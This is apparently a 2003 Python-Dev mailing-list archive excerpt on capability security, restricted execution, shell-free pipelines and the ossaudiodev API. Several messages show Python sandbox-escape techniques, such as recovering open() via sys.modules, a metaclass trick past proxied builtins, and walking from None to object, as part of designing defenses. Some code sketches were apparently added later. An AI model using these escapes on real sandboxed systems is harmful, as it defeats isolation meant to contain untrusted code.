familiar with), and nothing jumped out at me as needing to be wrapped or 
refactored before it could be used in a cap-Python.  Perhaps the Python Standard 
Library's natural modularity has already gotten us most of the way there.


> > http://www.erights.org/elib/capability/ode/ode-capabilities.html#patt-coop
> 
> I don't see the part of this paper that talks about library design :-). 
> I assume that it's the first section "Only Connectivity Begets
> Connectivity."  But I don't know if I understand how that applies to
> library design in concrete terms.

No, "Only Connectivity Begets Connectivity" is just the "pointer-safety" 
requirement -- that one can't get a reference to an object, except by either 
(a) creating the object, or (b) getting the reference from some other object 
which already had the reference.

Hm.  Yes, that page doesn't really talk about library design.  The authors of 
E performed a project [1] for DARPA in which they implemented a web browser 
which could host pluggable renderers, such that a malicious renderer was 
constrained in the damage it could do.  (I have no idea what DARPA wants with 
such a thing.  ;-))

The security review team at the conclusion of the project (which included great 
cryptographer David Wagner) wrote [2] that E appeared to have advanced the state 
of the art without breaking a sweat.  The security flaws that they uncovered 
were mostly due to insufficient wrapping of the Java standard libraries.  For 
example, the E folks had allowed an object to access a Java "File" object so 
that it could access a single file, without realizing that the Java File object 
has a "getParentFile()" method which returns the parent directory.

That was why I made such a big deal about the importance of a secure standard 
library in my previous message.  (As you know, Python's file objects don't have 
a "getParentFile()" method, so we're already one step ahead of Java there...)

Regards,

Zooko

[1] http://www.combex.com/tech/darpaBrowser.html
[2] http://www.combex.com/papers/darpa-review/index.html


From greg@cosc.canterbury.ac.nz  Mon Mar 10 20:23:10 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Tue, 11 Mar 2003 09:23:10 +1300 (NZDT)
Subject: [Python-Dev] Capabilities
In-Reply-To: <Pine.LNX.4.33.0303100436220.26966-100000@server1.lfw.org>
Message-ID: <200303102023.h2AKNAw23873@oma.cosc.canterbury.ac.nz>

Ka-Ping Yee <ping@zesty.ca>:

> The eventual ideal is to have a system where all objects are
> "pure" objects (i.e. non-introspectable capabilities) by default.

Perhaps it would be useful to distinguish between what
might be called "read-only" introspection, and more
powerful forms of introspection.

Usually it doesn't do any harm to be able to find out
things like what class an object belongs to and what
methods it supports, so perhaps these kinds of
introspections don't need to be restricted by default.

But more intrusive things like reading/writing arbitrary
attributes or calling arbitrary methods would require
special permission.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From greg@cosc.canterbury.ac.nz  Mon Mar 10 20:59:59 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Tue, 11 Mar 2003 09:59:59 +1300 (NZDT)
Subject: [Python-Dev] Capabilities
In-Reply-To: <200303101538.h2AFcTR12087@odiug.zope.com>
Message-ID: <200303102059.h2AKxxR24396@oma.cosc.canterbury.ac.nz>

Guido:

> That flag wasn't my idea, it was some one else's (Greg Ewing?).

Yes, it was my idea. I was thinking that there was already a word of
flags in the object struct that might have some room left, but I may
have been thinking of type objects.

I'm not sure it's such a good idea now anyway.  As has been pointed
out, you'd still need proxies of some kind to restrict interfaces. It
would just mean you'd be able to build your proxy out of any suitable
type of object.

The other idea was that trusted code would be able to set the flag on
all the objects that it passed to untrusted code, instead of having to
proxy them all. But, as has also been pointed out, that's a rather
brittle way to enforce security.

I think I agree that to really get on top of this security business we
need to move towards having dangerous things forbidden by default
rather than allowed by default.

To that end, it would be useful if we could pin down exactly what's
dangerous and what isn't.  It seems to me that most uses of
introspection by most programs are harmless. Can we sort out those
(hopefully few) things that are dangerous, and separate them from the
existing introspection mechanisms?

Access to sys.modules has been mentioned as a key thing that needs to
be restricted. Maybe this shouldn't be an arbitrarily-accessible
variable?  Maybe the sys module shouldn't be a module at all, but some
special object that won't let you do nasty things with its contents
unless you've got special privileges (which most code would *not*
have by default). 

One of the "nasty" things would be picking the real __builtins__ out
of sys.modules. Are there any others?
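
To make that concrete, here is a small sketch in current Python 3 (where
the module is called "builtins" rather than "__builtin__").  The run
helper is hypothetical.  The code is executed with an empty __builtins__,
yet a reference to sys is enough to get the real open() back.

```python
import sys


def run(source, **names):
    # Empty builtins: no open(), no __import__, nothing.
    env = {"__builtins__": {}}
    env.update(names)
    exec(source, env)
    return env


# Handing over sys undoes the restriction: every loaded module is reachable.
env = run("recovered = sys.modules['builtins'].open", sys=sys)
print(env["recovered"] is open)
```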

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From zooko@zooko.com  Mon Mar 10 21:15:18 2003
From: zooko@zooko.com (Zooko)
Date: Mon, 10 Mar 2003 16:15:18 -0500
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: Message from Guido van Rossum <guido@python.org>
 of "Sun, 09 Mar 2003 20:10:36 EST." <200303100110.h2A1AaC06743@pcp02138704pcs.reston01.va.comcast.net>
References: <E18s06J-0006ZD-00@localhost>  <200303100110.h2A1AaC06743@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <E18sUcB-0003SH-00@localhost>

(I, Zooko, wrote the lines prepended with "> > ".)

 Guido wrote:
>
> > The [Principle-of-Least-Privilege approach to securing a standard library]
> > is to separate the tools so that dangerous ones don't come tied together
> > with common ones.  The security policy, then, is expressed by code that
> > grants or withholds capabilities (== references) rather than by code that
> > toggles the "restricted" bit.
>
> This sounds interesting, but I'm not sure I follow it.  Can you
> elaborate by giving a couple of examples?

First let me say that "capability access control" [1] is a theoretical 
construct, comparable to "access control lists" [2] and "Trust Management" [3].
Each is a formal model for specifying access control rules -- who is allowed to 
do what.

But in the context of Python we are interested not only in the theoretical 
model but also in a specific way of implementing it -- by making object 
references unforgeable and binding all authorities to object references.

So in this discussion it may not be clear whether a claimed advantage of
"capabilities" flows from the formal model or from the practice of unifying
security programming with object oriented programming.  I don't think it is 
important to differentiate in this discussion.

Now for examples...

Hm, well first of all, where are rexec and Zope proxies currently used?  
I believe that a "cap-Python" would support those uses, implementing the same 
security policies, but more cleanly since access control would be a first-class 
part of the language.

I don't know Zope very well, and rather than guess, I'd like to ask someone who
does know Zope to give a typical example of how proxies are used in workaday 
Zope.  I suspect that capabilities are quite similar to Zope proxies.


Now for a quick made-up example to demonstrate what I meant about expressing
security policy above, consider a tic-tac-toe game that is supposed to draw to
the screen.

In "restricted Python v1", certain modules have been flagged as "safe" and others 
"unsafe".  Code can execute other code with a "restricted" flag set, something 
like this:

# restricted Python v1
game = eval(TicTacToeGame, restricted=True)
game.display()

Unfortunately, in "restricted Python v1", all of the modules that allow drawing 
to the screen are marked as "unsafe", so the tic-tac-toe-game immediately dies 
with an exception.

In "restricted Python v2", an arbitrary security policy can be implemented:

# restricted Python v2
games=[]
def securitypolicy(subject, action, object):
    if (((subject in games) and (action == "import") and (object == "wxPython")) or
        ((subject in games) and (action == "execute") and (object == "wxPython.Window")) or
        ((subject in games) and (action == "execute") and (object == "wxPython.Window.paint"))):
        return True
    # ...
    return False

game = eval(TicTacToeGame, policy=securitypolicy)
games.append(game)
game.display()

I think that the "rexec" design was along the lines of "restricted Python v2", 
but I apologize if this simple analogy insults anyone.

I'm not sure whether "restricted Python v2" is expressive enough to implement 
the capability security access control model or not, but I don't care, because 
I don't like "restricted Python v2".  I like restricted Python v3:

# restricted Python v3
game = TicTacToeGame()
game.display(wxPython.wxWindow())

Now the game object has a reference to the window object, and it can use that 
reference to draw the pictures.  If I later change this design and decide that 
instead of drawing to a window, I want the game to write to a file, then I'll 
change the implementation of the TicTacToeGame class, and then I'll come back 
here to this code and change it from passing a wxWindow to:

# restricted Python v3
game = TicTacToeGame()
game.display(open("/tmp/tttgame.out","w"))

Now if I were writing in "restricted Python v2", then in addition to those two 
changes I would also have to make a third change, which is to edit my 
securitypolicy function in order to allow this particular game object to access 
a file named "/tmp/tttgame.out", and to disallow it access to wxPython:

# restricted Python v2
def securitypolicy(subject, action, object):
    if (subject in games) and (action in ("read", "write",)) and (object == "file:/tmp/tttgame.out"):
        return True
    # ...
    return False

game = TicTacToeGame()
game.display("/tmp/tttgame.out")

This is what I meant by saying that the security policy is expressed in Python 
instead of by twiddling access bits in an embedded policy language.  In a 
capability-secure language, the change (which the programmer has to make anyway), 
from "wxPython.wxWindow()" to "open('/tmp/tttgame.out', 'w')" is necessary and 
sufficient to enforce the programmer's intended security policy, so there is no 
need for the redundant and brittle "policy" function.
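
A runnable sketch of the "v3" style, using an in-memory io.StringIO in
place of the window or file.  The board layout and the move method are
made up for illustration.  In stock Python the game could still import
modules or call open() itself; the sketch assumes a cap-Python in which
that ambient authority has been removed, so the argument to display() is
the only thing the game can write to.

```python
import io


class TicTacToeGame:
    def __init__(self):
        self.board = [[" "] * 3 for _ in range(3)]

    def move(self, row, col, mark):
        self.board[row][col] = mark

    def display(self, out):
        # The game affects only the object it was handed.
        for row in self.board:
            out.write("|".join(row) + "\n")


game = TicTacToeGame()
game.move(1, 1, "X")

buffer = io.StringIO()   # the capability granted to the game
game.display(buffer)
print(buffer.getvalue())
```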

I find this unification of access control and application logic to resonate deeply 
with the Zen of Python.

Regards,

Zooko

[1] http://www.eros-os.org/papers/shap-thesis.ps
[2] http://www.research.microsoft.com/~lampson/09-Protection/Acrobat.pdf
[3] http://citeseer.nj.nec.com/blaze96decentralized.html


From jim@zope.com  Mon Mar 10 21:16:02 2003
From: jim@zope.com (Jim Fulton)
Date: Mon, 10 Mar 2003 16:16:02 -0500
Subject: [Python-Dev] Capabilities
In-Reply-To: <067a01c2e736$4af64920$6d94fea9@newmexico>
References: <Pine.LNX.4.33.0303100456450.26966-100000@server1.lfw.org> <025c01c2e71b$e7a3cc40$6d94fea9@newmexico> <3E6CC705.7000901@zope.com> <067a01c2e736$4af64920$6d94fea9@newmexico>
Message-ID: <3E6D0092.6050404@zope.com>

Samuele Pedroni wrote:
> From: "Jim Fulton" <jim@zope.com>
> 
>>Could you explain why you say that zope proxies are brittle?
>>
> 
> 
> from my small experience playing with RestrictedInterpreter:

Um, er, I've been meaning to mention that RestrictedInterpreter is
not done and isn't used anywhere yet. It's a bit of a decoy
at this time. :]

At this point, RestrictedInterpreter is really an incomplete prototype.

OTOH, RestrictedBuiltins is used for Python expressions
in Zope page templates. Simple Python expressions in zpt
don't tend to run into the sorts of problems you've found.

> you wrap into proxies a lot of builtins:
> 
> *) 'object' for example, then
> class C(object): ... does not work

Right. We will fix this. It should be possible to subclass
proxied classes. The resulting classes should then be proxies.
object and type should probably be special cases.

> but given that some basic types are left alone, one can use
> Type = ''.__class__.__class__
> 
> class C:
>   __metaclass__ = Type


> *) iter seems not to work (deliberate decision or bug?)

bug I imagine.

> *) proxied 'property' is unusable

ditto

> *) built-in functions return proxies even if the argument were unproxied:
>
> _12 = map(None,[1,2])

Interesting case. It looks like map shouldn't be proxied.

> class A: pass
> a = A()
> a.a = [1,2]
> 
> _12 = getattr(a,'a')

Ditto.

> in both cases with the proxied version of map and getattr the result _12 would
> be a proxied list.
> 
> deliberate safer-side decisions?

no.


> I can see it both ways:
> - see other mail

I don't know what other mail you are referring to. Maybe it doesn't matter.

> - map(None,[obj])[0] becomes a way to get a proxied version of obj that can
> be passed to code that would maybe unwrap it and believe
> that is some other legit object.

Any code that unwraps proxies should be viewed with great suspicion.
I currently consider any use of that API without an extensive accompanying
comment to be a virtual "XXX" comment.

I'm sorry to have had you spend so much time on what is a bit of a decoy.
OTOH, you've pointed out a number of points that we do need to address to
move our RestrictedInterpreter beyond the prototype stage.

You've found a number of problems and issues in deciding how to proxy
builtins. I would argue that these are not problems in the proxies
themselves but in the applications to builtins. But perhaps I'm wrong.

Another area that we haven't dealt with yet is how proxies will work in
untrusted *persistent* modules. But you probably don't want to know
about that. ;)

Jim


-- 
Jim Fulton           mailto:jim@zope.com       Python Powered!
CTO                  (888) 344-4332            http://www.python.org
Zope Corporation     http://www.zope.com       http://www.zope.org


From pedronis@bluewin.ch  Mon Mar 10 21:26:41 2003
From: pedronis@bluewin.ch (Samuele Pedroni)
Date: Mon, 10 Mar 2003 22:26:41 +0100
Subject: [Python-Dev] Capabilities
References: <Pine.LNX.4.33.0303100456450.26966-100000@server1.lfw.org> <025c01c2e71b$e7a3cc40$6d94fea9@newmexico> <3E6CC705.7000901@zope.com> <067a01c2e736$4af64920$6d94fea9@newmexico> <3E6D0092.6050404@zope.com>
Message-ID: <0b3e01c2e74b$bdff8c00$6d94fea9@newmexico>

From: "Jim Fulton" <jim@zope.com>

> > I can see it both ways:
> > - see other mail
>
> I don't know what other mail you are referring to. Maybe it doesn't matter.

The other side of the coin is that, with a working unproxied/non-proxying
property and/or a non-proxied map and getattr, plus an unproxied MyExc
instance, I can break out of restricted execution.


From pedronis@bluewin.ch  Mon Mar 10 22:14:44 2003
From: pedronis@bluewin.ch (Samuele Pedroni)
Date: Mon, 10 Mar 2003 23:14:44 +0100
Subject: [Python-Dev] Capabilities
References: <Pine.LNX.4.33.0303100456450.26966-100000@server1.lfw.org> <025c01c2e71b$e7a3cc40$6d94fea9@newmexico> <3E6CC705.7000901@zope.com> <067a01c2e736$4af64920$6d94fea9@newmexico> <3E6D0092.6050404@zope.com>
Message-ID: <0c5a01c2e752$74c99e20$6d94fea9@newmexico>

From: "Jim Fulton" <jim@zope.com>
> Samuele Pedroni wrote:
> > From: "Jim Fulton" <jim@zope.com>
> >
> >>Could you explain why you say that zope proxies are brittle?
> >>
> >
> >
> > > from my small experience playing with RestrictedInterpreter:
>
> Um, er, I've been meaning to mention that RestrictedInterpreter is
> not done and isn't used anywhere yet. It's a bit of a decoy
> at this time. :]

I knew it isn't used. I'm not that naive; nevertheless it seemed to be a
showcase/playground for the proxy + restricted execution approach.

regards.


From jepler@unpythonic.net  Mon Mar 10 01:27:26 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Sun, 9 Mar 2003 19:27:26 -0600
Subject: [Python-Dev] test_popen broken on Win2K
In-Reply-To: <200303092252.h29Mqdk17019@oma.cosc.canterbury.ac.nz>
References: <BIEJKCLHCIOIHAGOKOLHAEMGFBAA.tim.one@comcast.net> <200303092252.h29Mqdk17019@oma.cosc.canterbury.ac.nz>
Message-ID: <20030310012724.GA1144@unpythonic.net>

[attribution lost]
> > Those would be quite different functions, then, unless you proposed to have
> > Python interpret native shell metacharacters on its own too (e.g., set up
> > pipes, do the indicated file redirections, interpolate envars, and fake
> > whatever other shell gimmicks people may use).

On Mon, Mar 10, 2003 at 11:52:39AM +1300, Greg Ewing wrote:
> What we need is a function which does all those things,
> but uses some way of specifying them *other* than shell
> metacharacters. E.g.
> 
>   os.plumb(("sed", "-e", "s/dead/resting/", "parrots"), 
>     ("grep", "norwegian"), output = myfile)

+1 on the concept.  +1 on something that can be transformed to use tcl's
"exec" so that it'll begin working on several common arches immediately.

Jeff


From tim.one@comcast.net  Tue Mar 11 00:41:42 2003
From: tim.one@comcast.net (Tim Peters)
Date: Mon, 10 Mar 2003 19:41:42 -0500
Subject: [Python-Dev] test_popen broken on Win2K
In-Reply-To: <20030310012724.GA1144@unpythonic.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEBIEAAB.tim.one@comcast.net>

[Greg Ewing]
> What we need is a function which does all those things,
> but uses some way of specifying them *other* than shell
> metacharacters. E.g.
>
>   os.plumb(("sed", "-e", "s/dead/resting/", "parrots"),
>     ("grep", "norwegian"), output = myfile)

[Jeff Epler]
> +1 on the concept.  +1 on something that can be transformed to use tcl's
> "exec" so that it'll begin working on several common arches immediately.

They're really the same thing -- Tcl's exec would be a simple transformation
of a cross-platform sh-like syntax into Greg's hypothesized functions.  The
pain in Tcl's exec implementation was in providing the functionality across
platforms, not in parsing the sh-like syntax.  Then again, Tcl was trying to
run all the way back to Windows 3.1, and Python already gave up on that.
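
For illustration, here is a minimal sketch of what Greg's hypothesized
function could look like on top of the subprocess module, which did not
exist when this thread was written.  The name plumb and the output
keyword come from Greg's example; the return value and the argument
handling are assumptions made for this sketch, not a proposed API.

```python
import subprocess


def plumb(*commands, output=None):
    """Run argv sequences as a pipeline, with no shell involved.

    Hypothetical helper: returns the list of exit codes, one per command.
    """
    if not commands:
        raise ValueError("plumb() needs at least one command")
    procs = []
    upstream = None  # stdout of the previous stage, if any
    for index, argv in enumerate(commands):
        is_last = index == len(commands) - 1
        proc = subprocess.Popen(
            list(argv),
            stdin=upstream,
            # Only the last stage writes to the caller's file object.
            stdout=output if is_last else subprocess.PIPE,
        )
        if upstream is not None:
            # Drop our copy of the pipe so the writer sees a broken pipe
            # if the reader exits early.
            upstream.close()
        upstream = proc.stdout
        procs.append(proc)
    return [proc.wait() for proc in procs]
```

With this sketch, Greg's call would read
plumb(("sed", "-e", "s/dead/resting/", "parrots"), ("grep", "norwegian"),
output=myfile), and no shell metacharacters are ever interpreted.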


From oren-py-d@hishome.net  Tue Mar 11 01:19:20 2003
From: oren-py-d@hishome.net (Oren Tirosh)
Date: Mon, 10 Mar 2003 20:19:20 -0500
Subject: [Python-Dev] test_popen broken on Win2K
In-Reply-To: <200303092252.h29Mqdk17019@oma.cosc.canterbury.ac.nz>
References: <BIEJKCLHCIOIHAGOKOLHAEMGFBAA.tim.one@comcast.net> <200303092252.h29Mqdk17019@oma.cosc.canterbury.ac.nz>
Message-ID: <20030311011920.GA41330@hishome.net>

On Mon, Mar 10, 2003 at 11:52:39AM +1300, Greg Ewing wrote:
> > Those would be quite different functions, then, unless you proposed to have
> > Python interpret native shell metacharacters on its own too (e.g., set up
> > pipes, do the indicated file redirections, interpolate envars, and fake
> > whatever other shell gimmicks people may use).
> 
> What we need is a function which does all those things,
> but uses some way of specifying them *other* than shell
> metacharacters. E.g.
> 
>   os.plumb(("sed", "-e", "s/dead/resting/", "parrots"), 
>     ("grep", "norwegian"), output = myfile)

How about this:

cmd.sed('-e', 's/dead/resting/', 'parrots') / cmd.grep('norwegian') >> myfile

or this:

import re

def mygrep(pattern):

    def tran(upstream):
        for s in upstream:
            if re.search(pattern, s):
                yield s

    return transformation(tran)

open('parrots') / (lambda s:s.replace('dead','resting')) / mygrep('norwegian') >> open('myfile', 'w')


This is not some hypothetical syntax - I have a module that actually 
does this. It can mix python functions, generators and external commands 
in the same flow, use any iterable object as source, use a file, list 
or other data consumer as destination and a few more goodies.

It's not finished but it mostly works. I don't have much time to 
work on it, though.
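
The module itself is not shown in this thread, so the following is only
a rough sketch of how the "/" and ">>" operators could be wired up with
operator overloading.  The class names Flow and Transformation are made
up for the illustration and are not the actual implementation; external
commands are left out entirely.

```python
import re


class Transformation:
    """Marks a function that maps a whole upstream iterable to a new one."""

    def __init__(self, func):
        self.func = func


class Flow:
    """Wrap an iterable so `/` adds a stage and `>>` drains into a sink."""

    def __init__(self, source):
        self.source = source

    def __iter__(self):
        return iter(self.source)

    def __truediv__(self, stage):
        if isinstance(stage, Transformation):
            # Generator-style stage: sees the whole upstream iterable.
            return Flow(stage.func(self.source))
        # Plain callable: applied to each item in turn.
        return Flow(map(stage, self.source))

    def __rshift__(self, sink):
        if hasattr(sink, "write"):
            for item in self:
                sink.write(item)
        else:
            sink.extend(self)
        return sink


def mygrep(pattern):
    def tran(upstream):
        for s in upstream:
            if re.search(pattern, s):
                yield s
    return Transformation(tran)
```

Since "/" binds more tightly than ">>", an expression such as
Flow(lines) / f / mygrep('norwegian') >> [] builds the whole chain first
and only then drains it into the list.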

oh-dear-what-have-I-done-now-I'll-have-to-finish-it-ly yours,

    Oren


From Anthony Baxter <anthony@interlink.com.au>  Tue Mar 11 02:07:01 2003
From: Anthony Baxter <anthony@interlink.com.au> (Anthony Baxter)
Date: Tue, 11 Mar 2003 13:07:01 +1100
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: <200303101540.h2AFeW012107@odiug.zope.com>
Message-ID: <200303110207.h2B272e30128@localhost.localdomain>

>>> Guido van Rossum wrote
>  The only truly secure
> object is None. :-)

You sure?

>>> None.__class__.__class__.mro(type(None))[1]
<type 'object'>

Not sure what else it's possible to get to from None...
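
The same walk can be written as a small function.  This sketch uses
present-day Python 3 spelling (the session above is Python 2), and the
function name is made up for the illustration.

```python
def root_class_via(value):
    """Reach `object` from any value using only attribute access."""
    cls = value.__class__          # NoneType when value is None
    metaclass = cls.__class__      # type
    # The last entry of any method resolution order is `object`.
    return metaclass.mro(cls)[-1]
```

Once object is in hand, object.__subclasses__() enumerates the direct
subclasses of object, which is a much larger surface than None suggests.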

Anthony
-- 
Anthony Baxter     <anthony@interlink.com.au>   
It's never too late to have a happy childhood.


From mwh@python.net  Tue Mar 11 10:29:45 2003
From: mwh@python.net (Michael Hudson)
Date: Tue, 11 Mar 2003 10:29:45 +0000
Subject: [Python-Dev] test_popen broken on Win2K
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEBIEAAB.tim.one@comcast.net> (Tim
 Peters's message of "Mon, 10 Mar 2003 19:41:42 -0500")
References: <LNBBLJKPBEHFEDALKOLCAEBIEAAB.tim.one@comcast.net>
Message-ID: <2mfzpufb6u.fsf@starship.python.net>

Tim Peters <tim.one@comcast.net> writes:

> [Greg Ewing]
>> What we need is a function which does all those things,
>> but uses some way of specifying them *other* than shell
>> metacharacters. E.g.
>>
>>   os.plumb(("sed", "-e", "s/dead/resting/", "parrots"),
>>     ("grep", "norwegian"), output = myfile)
>
> [Jeff Epler]
>> +1 on the concept.  +1 on something that can be transformed to use tcl's
>> "exec" so that it'll begin working on several common arches immediately.
>
> They're really the same thing -- Tcl's exec would be a simple transformation
> of a cross-platform sh-like syntax into Greg's hypothesized functions.

I think Jeff was suggesting that we implement it like this:

def plumb(cmd):
    import Tkinter
    return Tkinter.call('exec ' + cmd)

or whatever.

Cheers,
M.

-- 
  at any rate, I'm satisfied that not only do they know which end of
  the pointy thing to hold, but where to poke it for maximum effect.
                                  -- Eric The Read, asr, on google.com


From gward@python.net  Tue Mar 11 14:15:59 2003
From: gward@python.net (Greg Ward)
Date: Tue, 11 Mar 2003 09:15:59 -0500
Subject: [Python-Dev] Audio devices
Message-ID: <20030311141559.GA15139@cthulhu.gerg.ca>

Back at work on the ossaudiodev docs for a few minutes.  Documenting an
API is always a great opportunity to clean it up, and the
ossaudiodev.open() function has a weird interface right now.  From the
current docs:

"""
open([device, ] mode)
    Open an audio device and return an OSS audio device object. This
    object supports many file-like methods, such as read(), write(), and
    fileno() (although there are subtle differences between conventional
    Unix read/write semantics and those of OSS audio devices). It also
    supports a number of audio-specific methods; see below for the
    complete list of methods.

    Note the unusual calling syntax: the first argument is optional, and
    the second is required. This is a historical artifact for
    compatibility with the older linuxaudiodev module which ossaudiodev
    supersedes.

    device is the audio device filename to use. If it is not specified,
    this module first looks in the environment variable AUDIODEV for a
    device to use. If not found, it falls back to /dev/dsp.

    mode is one of 'r' for read-only (record) access, 'w' for write-only
    (playback) access and 'rw' for both. Since many soundcards only
    allow one process to have the recorder or player open at a time it
    is a good idea to open the device only for the activity
    needed. Further, some soundcards are half-duplex: they can be opened
    for reading or writing, but not both at once.
"""

The historical background is that in linuxaudiodev prior to Python 2.3,
it was *impossible* to specify the device file to open -- you had to do
something like this:

  os.environ['AUDIODEV'] = "/dev/dsp2"
  dsp = linuxaudiodev.open("w")

Fixing that wart is what led me to create ossaudiodev in the first
place.  Cleaning up the remaining ugliness in ossaudiodev.open() brings
things nicely full-circle.  Anyways, since the module has been renamed,
who cares about backwards compatibility with linuxaudiodev?  I'd like to
change the open() interface to:

  open(device, mode)

where both are required.  (Most use of the audio device is for playback,
not recording.  But a default mode of "w" goes counter to expectations.
So I think 'mode' should be required.)

This would also mean getting rid of the $AUDIODEV check in
ossaudiodev.c.  Less C code is a good thing, unless of course it leads
to lots of redundant Python code all over the world.
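
To make the trade-off concrete: if the $AUDIODEV check leaves the C
module, a script that wants the old behaviour would need something like
the sketch below.  The helper name pick_audio_device is hypothetical;
only the AUDIODEV variable and the /dev/dsp fallback come from the
current docs quoted above.

```python
import os


def pick_audio_device(environ=None, fallback="/dev/dsp"):
    """Return $AUDIODEV if it is set and non-empty, else the fallback."""
    if environ is None:
        environ = os.environ
    return environ.get("AUDIODEV") or fallback
```

A caller would then write open(pick_audio_device(), "w") with the
proposed two-argument interface.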

Finally, for consistency I should also change openmixer() to require a
'device' argument (currently, it does the same thing, but hardcodes
"/dev/mixer" and checks $MIXERDEVICE).

Of course, this will lead people to hardcode "/dev/dsp" (and/or
"/dev/mixer") into their Python audio scripts.  That's bad if other
OSS-using operating systems have different names for the standard audio
devices.  Do they?

But it's certainly no *worse* than the situation for C programmers, who
have to assume "/dev/dsp" as a default -- the open(2) system call
certainly doesn't let you get away with leaving the filename out.  And
besides, "/dev/dsp" is already hard-coded into ossaudiodev.c, so if
that's inappropriate on certain operating systems, somebody's going to
lose already. 

Thoughts?

        Greg
-- 
Greg Ward <gward@python.net>                         http://www.gerg.ca/
Sure, I'm paranoid... but am I paranoid ENOUGH?


From guido@python.org  Tue Mar 11 14:54:00 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 11 Mar 2003 09:54:00 -0500
Subject: [Python-Dev] Audio devices
In-Reply-To: Your message of "Tue, 11 Mar 2003 09:15:59 EST."
 <20030311141559.GA15139@cthulhu.gerg.ca>
References: <20030311141559.GA15139@cthulhu.gerg.ca>
Message-ID: <200303111454.h2BEs1B23261@odiug.zope.com>

> Back at work on the ossaudiodev docs for a few minutes.

Great!  I wonder if you have any thoughts on why running
test_ossaudiodev hangs when run on Linux Red Hat 7.3?  I'm currently
using a 2.4.18-24.7.x kernel.  I have no idea what other info would be
useful to debug this.

Regarding the changes you propose, I was going to vote +1 on all, but
I realize I'm not a user so my vote should only count as epsilon.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From gward@python.net  Tue Mar 11 15:58:41 2003
From: gward@python.net (Greg Ward)
Date: Tue, 11 Mar 2003 10:58:41 -0500
Subject: [Python-Dev] Audio devices
In-Reply-To: <200303111454.h2BEs1B23261@odiug.zope.com>
References: <20030311141559.GA15139@cthulhu.gerg.ca> <200303111454.h2BEs1B23261@odiug.zope.com>
Message-ID: <20030311155841.GB14963@cthulhu.gerg.ca>

On 11 March 2003, Guido van Rossum said:
> Great!  I wonder if you have any thoughts on why running
> test_ossaudiodev hangs when run on Linux Red Hat 7.3?  I'm currently
> using a 2.4.18-24.7.x kernel.  I have no idea what other info would be
> useful to debug this.

The most obvious cause is that some other process has the audio device
open, and your audio {hardware, device driver} only allows one at a
time.

If you're running one of those newfangled GUI environments like KDE or
GNOME, it's quite likely that the esound or aRTSd (however you spell it)
daemon started when you logged in, and is thus blocking all access to
your /dev/dsp.  This sucks, but IMHO it's not ossaudiodev's job to know
about esound and similar.

One way to test this is to take your system down to single-user (or at
least a console-only, no-X11 runlevel) and then try running
test_ossaudiodev.

Hmmm, it looks like calling open() with O_NONBLOCK helps.  I know this
does *not* affect later read()/write() -- there's a special ioctl() for
non-blocking read/write -- but it *does* appear to fix blocking open().
At least for me it turned a second open() attempt on the same device
from "hang" to "IOError: [Errno 16] Device or resource busy:
'/dev/dsp2'".

Try this patch; if it works I'll check it in:

--- Modules/ossaudiodev.c       10 Mar 2003 03:17:06 -0000      1.24
+++ Modules/ossaudiodev.c       11 Mar 2003 15:56:24 -0000
@@ -131,7 +131,7 @@
           basedev = "/dev/dsp";
     }
 
-    if ((fd = open(basedev, imode)) == -1) {
+    if ((fd = open(basedev, imode|O_NONBLOCK)) == -1) {
         PyErr_SetFromErrnoWithFilename(PyExc_IOError, basedev);
         return NULL;
     }

test_ossaudiodev.py will still need fixing to handle the EBUSY error,
but at least this should prevent hanging on open().
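
For the test-suite side, the same idea can be sketched in pure Python
with os.open().  The function name and the choice to return None for a
busy device are assumptions for the illustration; this is not what
test_ossaudiodev.py currently does.

```python
import errno
import os


def open_device_nonblocking(path, mode_flags=os.O_WRONLY):
    """Open `path` without hanging; return the fd, or None if it is busy."""
    try:
        return os.open(path, mode_flags | os.O_NONBLOCK)
    except OSError as exc:
        if exc.errno == errno.EBUSY:
            # Someone else holds the device: report it instead of blocking.
            return None
        raise
```

A test could then skip itself when None comes back rather than failing
or hanging.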

        Greg
-- 
Greg Ward <gward@python.net>                         http://www.gerg.ca/
Hand me a pair of leather pants and a CASIO keyboard -- I'm living for today!


From guido@python.org  Tue Mar 11 16:04:54 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 11 Mar 2003 11:04:54 -0500
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: Your message of "Mon, 10 Mar 2003 16:15:18 EST."
 <E18sUcB-0003SH-00@localhost>
References: <E18s06J-0006ZD-00@localhost> <200303100110.h2A1AaC06743@pcp02138704pcs.reston01.va.comcast.net>
 <E18sUcB-0003SH-00@localhost>
Message-ID: <200303111605.h2BG4wA24117@odiug.zope.com>

(Zooko, would it kill you to keep your line lengths well below 79?)

[Zooko]
> > > The [Principle-of-Least-Privilege approach to securing a
> > > standard library] is to separate the tools so that dangerous
> > > ones don't come tied together with common ones.  The security
> > > policy, then, is expressed by code that grants or withholds
> > > capabilities (== references) rather than by code that toggles
> > > the "restricted" bit.

[Guido]
> > This sounds interesting, but I'm not sure I follow it.  Can you
> > elaborate by giving a couple of examples?

[Zooko]
> First let me say that "capability access control" [1] is a
> theoretical construct, comparable to "access control lists" [2] and
> "Trust Management" [3].  Each is a formal model for specifying
> access control rules -- who is allowed to do what.
> 
> But in the context of Python we are interested not only in the
> theoretical model but also in a specific way of implementing it --
> by making object references unforgeable and binding all authorities
> to object references.
> 
> So in this discussion it may not be clear whether a claimed
> advantage of "capabilities" flows from the formal model or from the
> practice of unifying security programming with object oriented
> programming.  I don't think it is important to differentiate in this
> discussion.
> 
> Now for examples...
> 
> Hm, well first of all, where are rexec and Zope proxies currently
